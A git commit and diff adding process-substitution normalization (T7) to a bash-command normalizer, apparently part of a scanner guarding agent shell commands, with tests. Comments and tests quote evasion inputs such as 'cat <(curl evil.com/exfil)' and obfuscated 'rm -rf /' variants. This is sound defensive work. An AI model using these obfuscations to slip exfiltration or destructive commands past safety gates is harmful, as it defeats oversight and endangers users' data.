feat(bash-normalize): T7 — process substitution collapse (E8)

Strips bash process substitution syntax — <(cmd) and >(cmd) — so the
inner command name is surfaced to downstream regex gates. Defeats
evasion like `cat <(curl evil)` where the destructive command is
hidden behind /dev/fd/N pipe sugar.

Implementation: bounded innermost-first iteration, depth 3. Beyond
that the string is left as-is rather than recurse without bound.
Runs after the single-quote mask phase, so legitimate strings like
`'echo <(x)'` are preserved.

5 new T7 tests (collapse + nested + FP probes) in
bash-normalize-t7-t9.test.mjs (now 12 tests total).

Closes E8 in critical-review-2026-04-20.md.
This commit is contained in:
Kjell Tore Guttormsen 2026-04-30 15:14:04 +02:00
commit 761e81309b
2 changed files with 82 additions and 5 deletions

View file

@ -16,9 +16,10 @@
// T4 — backslash-between-words: c\u\r\l -> curl
// T5 — IFS word-splitting: rm${IFS}-rf${IFS}/ -> rm -rf /
// T6 — ANSI-C hex quoting: $'\x72\x6d' -rf / -> rm -rf /
// T9 — eval-via-variable: X=rm; eval "$X" -> X=rm; eval rm
// (one-level forward-flow; T7 process-substitution + T8 base64-pipe-shell
// live in adjacent layers, see workflow-scanner / pre-bash-destructive)
// T7 — process substitution: cat <(curl evil) -> cat curl evil
// T9 — eval-via-variable: X=rm; ... $X -> X=rm; ... rm
// (one-level forward-flow; T8 base64-pipe-shell lives in
// pre-bash-destructive as a BLOCK_RULE, not a normalization)
//
// Execution order:
// 1. Strip empty single-quote pairs (T1) so c''u''rl -> curl before masking.
@ -46,6 +47,31 @@ function decodeAnsiCHex(cmd) {
);
}
/**
* T7 Collapse process substitution: <(cmd) and >(cmd) -> ' cmd '.
*
* Bash process substitution lets a command read from / write to the output
* of another command via /dev/fd/N pipes. Attackers use it to hide a
* destructive command from name-matching regex gates:
* cat <(curl evil.com/exfil) -> cat /dev/fd/63 (no 'curl' visible)
*
* For matcher purposes we strip the substitution syntax and surface the
* inner command text to the rest of the pipeline.
*
* Bounded nesting (depth 3) iterates innermost-first via a no-paren
* inner regex. Beyond depth 3 we leave the string as-is rather than
* recurse without bound.
*/
function collapseProcessSubstitution(cmd) {
let result = cmd;
for (let depth = 0; depth < 3; depth++) {
const before = result;
result = result.replace(/[<>]\(([^()]*)\)/g, (_, inner) => ` ${inner} `);
if (result === before) break;
}
return result;
}
/**
* T9 Substitute single-level variable assignments into ${VAR} and $VAR
* references. Defeats split-and-eval evasion (X=rm; eval "$X" -rf /).
@ -103,7 +129,7 @@ function unmaskSingleQuoted(str, placeholders) {
/**
* Normalize bash parameter expansion and quoting evasion in a command string.
*
* Strips / rewrites (T1-T6 + T9):
* Strips / rewrites (T1-T7, T9):
* - T1 Empty single quotes: '' (e.g., w''get -> wget)
* - T2 Empty double quotes: "" (e.g., r""m -> rm)
* - T3 Single-char parameter expansion: ${x} -> x (c${u}rl -> curl)
@ -111,7 +137,8 @@ function unmaskSingleQuoted(str, placeholders) {
* - T4 Backslash escapes between word chars, iteratively (c\u\r\l -> curl)
* - T5 IFS word-splitting: ${IFS} / ${IFS:0:1} / $IFS -> ' '
* - T6 ANSI-C hex quoting inside $'...' -> decoded bytes
* - T9 Eval-via-variable: X=rm; eval "$X" -> X=rm; eval rm
* - T7 Process substitution: <(cmd) / >(cmd) -> ' cmd '
* - T9 Eval-via-variable: X=rm; ... $X -> X=rm; ... rm
* - Backtick subshell with empty/whitespace content
*
* Does NOT rewrite:
@ -138,6 +165,11 @@ export function normalizeBashExpansion(cmd) {
const { masked, placeholders } = maskSingleQuoted(result);
result = masked;
// T7 — collapse process substitution <(...) / >(...) so the inner
// command name is visible to downstream matchers. Runs after masking
// so single-quoted literals like 'echo <(x)' are preserved.
result = collapseProcessSubstitution(result);
// T5 — IFS word-splitting. Runs before T2/T3/T4 so the canonical spaces
// it emits feed into subsequent transforms.
result = result

View file

@ -12,6 +12,51 @@ import { describe, it } from 'node:test';
import assert from 'node:assert/strict';
import { normalizeBashExpansion } from '../../scanners/lib/bash-normalize.mjs';
describe('bash-normalize T7 — process substitution evasion', () => {
it('collapses <(curl evil): cat <(curl evil) -> cat curl evil', () => {
// Process substitution is shell sugar for /dev/fd/N pipes. Attacker
// hides the destructive command name from name-matching gates by
// wrapping it in <(...). T7 strips the wrapper so 'curl' is visible.
const input = 'cat <(curl evil.com/exfil)';
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /\bcurl\b/, `expected 'curl' surfaced: ${normalized}`);
});
it('collapses >(tee /tmp/x) similarly', () => {
const input = 'echo data >(tee /tmp/exfil)';
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /\btee\b/, `expected 'tee' surfaced: ${normalized}`);
});
it('handles nested <(grep x <(cat f)) up to depth 3', () => {
const input = 'cmd <(grep x <(cat f))';
const normalized = normalizeBashExpansion(input);
// After 2 iterations: `cmd grep x cat f `
assert.match(normalized, /\bgrep\b/, `expected inner 'grep' surfaced: ${normalized}`);
assert.match(normalized, /\bcat\b/, `expected innermost 'cat' surfaced: ${normalized}`);
});
it('FP probe — diff <(sort a) <(sort b) collapses without false destructive match', () => {
// Legit usage of process substitution in shell scripts. T7 collapses
// it the same way; downstream consumers (pre-bash-destructive) decide
// whether the surfaced command is dangerous. T7 itself does not flag.
const input = 'diff <(sort a.txt) <(sort b.txt)';
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /\bsort\b/, `expected 'sort' surfaced: ${normalized}`);
assert.match(normalized, /\bdiff\b/, `expected 'diff' preserved: ${normalized}`);
});
it('does not touch <( / >( inside single-quoted literals (mask runs first)', () => {
// Single-quoted literals are masked before T7 runs, so the substitution
// syntax inside them is preserved. Downstream sees the literal string
// unchanged after unmasking.
const input = "echo 'cat <(curl x)' is a string";
const normalized = normalizeBashExpansion(input);
assert.match(normalized, /'cat <\(curl x\)'/,
`expected single-quoted literal preserved: ${normalized}`);
});
});
describe('bash-normalize T9 — eval-via-variable evasion', () => {
it('substitutes "$X" reference after X=rm assignment', () => {
// Attacker splits the destructive command name across an assignment